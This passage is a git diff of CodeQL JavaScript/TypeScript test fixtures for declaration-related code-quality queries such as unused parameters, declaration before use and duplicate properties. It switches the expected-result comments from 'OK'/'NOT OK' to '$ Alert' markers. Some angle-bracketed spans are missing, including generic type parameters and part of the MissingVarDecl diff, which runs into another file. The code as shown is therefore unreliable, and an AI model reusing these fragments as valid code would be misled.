/* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway /*global: z*/ // also not a proper global declaration -w; // OK -x; // OK -y; // not OK -z; // not OK +w; +x; +y; // $ Alert +z; // $ Alert var x, y, z; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js index 2fb118b1541e..2808e89550f5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js @@ -1,11 +1,11 @@ function f(x) { - console.log(x); // OK + console.log(x); } -console.log(x); // NOT OK +console.log(x); // $ Alert var x = 1; function g() { - console.log(y); // OK (not in same function) + console.log(y); // OK - not in same function } var y = 1; diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts index 0de18d48a482..f949cd26fc76 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts @@ -1,7 +1,7 @@ -@Component(Foo) // OK +@Component(Foo) class Foo {} -declare class Bar extends Baz {} // OK +declare class Bar extends Baz {} declare class Baz {} export type { I }; // OK - does not refer to the constant 'I' diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js index 5014f7d5dbf3..0b5ef32b81a7 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js @@ -1,7 +1,6 @@ -// NOT OK -var a, b, a = 42; +var a, b, a = 42; // $ Alert + -// OK var x; var y; var x; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js index 8ace9c1472ab..96cb2578e3d2 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js @@ -1 +1 @@ -function getStuff(number) {} // OK: don't report anything related type annotations in .js files +function getStuff(number) {} // OK - don't report anything related type annotations in .js files diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts index 5aadd17c4d58..a9713de9685e 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts @@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); // $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts @@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..6912653c27b5 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" @@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js @@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..142bcc8d55a3 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +\u0078 // $ Alert ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js @@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts @@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts @@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { // OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts @@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } @@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..17f6b2c218f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,8 +21,7 @@ function K(x, y) { return y; } -// NOT OK -/** +/** // $ Alert * @param {*} x the first argument * @param {*} y the second argument */ @@ -30,7 +29,7 @@ function K(x, y) { return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx @@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
Hello
); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..7d76d97b96bb 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..708ef01ba929 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; type FooBar = T extends [infer S extends Foo, ...unknown[]] diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 